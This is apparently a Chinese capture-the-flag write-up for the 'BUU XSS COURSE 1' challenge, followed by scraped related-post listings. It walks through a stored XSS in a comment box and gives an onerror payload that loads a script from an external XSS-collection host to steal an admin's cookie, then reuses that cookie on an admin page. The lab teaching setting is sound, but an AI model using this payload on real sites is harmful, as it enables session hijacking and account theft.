BUU XSS COURSE 1 wp XSS平台在线注册
前言:啊啊啊啊!我蚌埠住了,在网上找的wp就一个两个的,跟着做,作为一个pwn手web萌新理解起来十分不友好,还没通,非常生气,学了一会,自己做通了。于是开始打算自己写个wp给后人,让后面的萌新能够理解的更透彻,少走我的弯路淦。
咱就是从这个题目入手吧,打开之后是这个界面
根据题目提示,有xss注入相关内容,查看登录,发现走不通,于是从这个吐槽入手。
输入
<script>alert(1)</script>
测试一下
发现没有文字,是不正常的现象。但是也没弹窗,说明存在漏洞,但是可能script被屏蔽了
输入
<img src="#">
发现有个图片标志,说明存在漏洞
则判断存在注入点,XSS注入攻击是一个很大的类,这里我仅从这题出手,这题目是存储型XSS,相关知识自行搜索。参考
具体原理就是相当于我们将我们的木马放到这个网站上了,当别人访问这个网站,我们的木马就会窃取他的cookie等相关信息。这里就是偷取了管理员的cookie
具体操作就是
先通过吐槽框将我们的payload 提交到服务端,服务端会将这个数据保存并显示在留言板上,只要有人访问这个留言板,就会触发我们的代码。
我们的payload 通过在标签中(例如head,body)添加我们自己的XSS平台的javascript源,即每当有人访问留言板就会触发我们的payload 并且会引入我们的JS文件。
这里就提到一个重点了,自己的XSS平台,这个东西兄弟们可以理解为一个远程木马服务器,如果有访问,我们的服务器上就会获取他的信息。
那么我们应该如何搭建自己的"木马服务器"呢,这里其实网上都有教程,不过需要内网穿透,而我们老白嫖怪了,网上有个免费的在线xss测试平台,这里把链接放出来XSS平台
大家自行注册,登录进去后,大家先创一个项目
项目中勾取这个代码
点击查看代码
如果你读过别人的wp你会发现有个东西很像别人的代码,就是这里
<img src=x οnerrοr=s=createElement('script');body.appendChild(s);s.src='//xss.yt/SFTX';>
代码具体意思就是
它使用>标签的onerror事件来执行一个JavaScript代码块。当图片加载失败时,onerror事件将被触发,从而执行该代码块。该代码块创建了一个script元素,并将其src属性设置为//xss.yt/SFTX。然后,它将该元素添加到文档的头部。这意味着,当页面加载时,该脚本将被下载并执行,从而允许攻击者注入恶意代码并执行任意操作。
我们复制此代码提交
再访问
我们发现
已经成功植入代码
回到项目内容查看
发现2个头
在第二个头中我们发现了admin的cookie以及url
于是我们构造包,访问http://c1ca7eb7-d615-4731-893e-33ae9f28ce2a.node4.buuoj.cn:81/backend/admin.php
ps:可以类比推理出这个文件位置
如果cookie不对,它会显示这个
把cookie改掉为admin的
获取flag
BUU XSS COURSE 1 wp XSS平台在线注册相关推荐
- XSS平台的用法、存储型XSS、Dom based XSS
XSS平台的用法.存储型XSS.Dom based XSS 如何使用XSS平台 这里介绍一种常用的xss平台.https://xsspt.com/ 如果xss的payload比较复杂的话,我们可以使用 ...
- Java接口xss,Java审计之XSS篇
Java审计之XSS篇 0x00 前言 继续 学习一波Java审计的XSS漏洞的产生过程和代码. 0x01 Java 中XSS漏洞代码分析 xss原理 xss产生过程: 后台未对用户输入进行检查或过滤 ...
- 【XSS漏洞03】XSS漏洞验证、语句构造与绕过方法
目录 1 漏洞验证相关概念 2 XSS漏洞验证 2.1 常见POC 2.2 反射型XSS漏洞验证 2.3 存储型XSS漏洞验证 2.4 DOM型XSS漏洞验证 3 XSS语句构造与绕过 3.1 XSS ...
- 【XSS漏洞-02】XSS靶场介绍(含BlueLotus_XSSReceiver、DVWA、XSS-labs等)
1 XSS靶场简介 XSS-labs:一款以练习测试XSS思路和命令的闯关游戏,主要是以反射型XSS漏洞为主. DVWA:一个功能较全的靶场环境,漏洞类型齐全,包含在XSS三种类型的漏洞,各有4个级别 ...
- XSS学习笔记:XSS Game(xss.pwnfunction.com)1-11通关全解
前言 继续学习XSS 本篇是XSS Game平台的通关全解 1.Ma Spaghet! 源码 一个不安全的方式 直接get传输somebody 输入123看看位置 ?somebody=123 那就很简 ...
- XSS专栏之常见xss总结备忘
layout: post title: XSS专栏 category: Vulnerability_mining tags: XSS keywords: XSS,CSP 前言 开始总结一些xss的想法 ...
- 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录
XSS: 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一.跨站脚本漏洞(XSS) XSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发 ...
- 【XSS漏洞-01】XSS漏洞简介、危害与分类及验证
目录 1 XSS漏洞简介 2 XSS漏洞危害 3 XSS漏洞分类 3.1 反射型XSS 3.2 存储型XSS 3.3 DOM型XSS 3.3.1 节点树模型 3.3.2 DOM型XSS 4 漏洞验证 ...
- php xss速查表,2020跨站脚本[xss]速查表 xss cheat sheet
此跨站脚本(XSS)备忘单包含许多向量,可以帮助您绕过WAF和过滤器.您可以通过事件,标签或浏览器选择向量,每个向量都包含概念证明. 该备忘单会在2020年进行定期更新. 最近更新:2020年6月4日 ...
最新文章
- poj3617 贪心
- ubuntu 设置开机启动与关闭开机启动(适用于部分linux系统)
- php7过滤,PHP7过滤unserialize()
- 【渝粤题库】陕西师范大学201281 民法作业
- etmvc mysql乱码_Etmvc学习文档
- Nisus Writer Pro for Mac拆分视图和注释技巧
- Vim vimrc配置
- ASP.NET MVC 5 - 入门
- 如何快速开发一款APP
- 第十五周博客作业西北师范大学|李晓婷
- html中span隐藏属性,span标签的class属性
- Ubuntu 禁用Guest用户
- linux乌班图做服务器,使用 Ubuntu 16.04 搭建全能服务器
- 双十一健身运动装备有哪些值得买?运动好物推荐分享
- Springboot文件上传报错:failed to convert java.lang.String to org.springframework.util.unit.DataSize
- 记参加哈工大SCIR(赛尔)实验室笔试
- C语言计算今天是一年的第几周
- 搜图网vvic商品详情api接口
- 手把手写算法(学个语言)
- Angular 已死,React 已凉,Vue3.0 称王!
热门文章
- 网上商城购物系统的优势和建站方法
- 安川与欧姆龙Plc通讯设置方法
- 西门子S7-1200PLC双轴定位算法电池焊接控制博图程序案例,触摸屏画面采用威纶触摸屏
- PPT结尾页只会写“谢谢”?用这些结尾,让你惊艳全场
- 遨博协作机器人ROS开发 - 机械臂自主避障
- LINUX矩阵键盘简单介绍,介绍一种新型的矩阵键盘电路
- HTML5七夕情人节表白网页(庆祝生日蛋糕烟花特效) HTML+CSS+JavaScript
- 618还是购书才最实在
- matlab局部趋势线,自动趋势线 局部极点
- 从零开始学单片机c语言 pdf,从零开始学习单片机.pdf